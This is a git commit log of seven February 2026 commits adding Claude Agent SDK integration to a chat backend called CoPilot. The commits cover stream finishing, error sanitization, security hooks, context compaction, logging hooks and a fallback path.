Zamil Majdy	b9c759ce4f	fix(backend/chat): Address additional PR review comments - Add terminal StreamFinish in adapt_sdk_stream if SDK ends without one - Sanitize error message in adapt_sdk_stream exception handler - Pass full JSON schema (type, properties, required) to tool decorator	2026-02-08 07:14:45 +04:00
Zamil Majdy	5efb80d47b	fix(backend/chat): Address PR review comments for Claude SDK integration - Add StreamFinish after ErrorMessage in response adapter - Fix str.replace to removeprefix in security hooks - Apply max_context_messages limit as safety guard in history formatting - Add empty prompt guard before sending to SDK - Sanitize error messages to avoid exposing internal details - Fix fire-and-forget asyncio.create_task by storing task reference - Fix tool_calls population on assistant messages - Rewrite Anthropic fallback to persist messages and merge consecutive roles - Only use ANTHROPIC_API_KEY for fallback (not OpenRouter keys) - Fix IndexError when tool result content list is empty	2026-02-06 13:25:10 +04:00
Zamil Majdy	b49d8e2cba	fix lock	2026-02-06 13:19:53 +04:00
Zamil Majdy	452544530d	feat(chat/sdk): Enable native SDK context compaction - Remove manual truncation in conversation history formatting - SDK's automatic compaction handles context limits intelligently - Add observability hooks: - PreCompact: Log when SDK triggers context compaction - PostToolUse: Log successful tool executions - PostToolUseFailure: Log and debug failed tool executions - Update config: increase max_context_messages (SDK handles compaction)	2026-02-06 12:44:48 +04:00
Zamil Majdy	32ee7e6cf8	fix(chat): Remove aggressive stale task detection The 60-second timeout was too aggressive and could incorrectly mark legitimate long-running tool calls as stale. Relying on Redis TTL (1 hour) for cleanup is sufficient and more reliable.	2026-02-06 11:45:54 +04:00
Zamil Majdy	670663c406	Merge dev and resolve poetry.lock conflict	2026-02-06 11:40:41 +04:00
Zamil Majdy	0dbe4cf51e	feat(backend/chat): Add Claude Agent SDK integration for CoPilot This PR adds Claude Agent SDK as the default backend for CoPilot chat completions, replacing the direct OpenAI API integration. Key changes: - Add Claude Agent SDK service layer with MCP tool adapter - Fix message persistence after tool calls (messages no longer disappear on refresh) - Add OpenRouter tracing for session title generation - Add security hooks for user context validation - Add Anthropic fallback when SDK is not available - Clean up excessive debug logging	2026-02-06 11:38:17 +04:00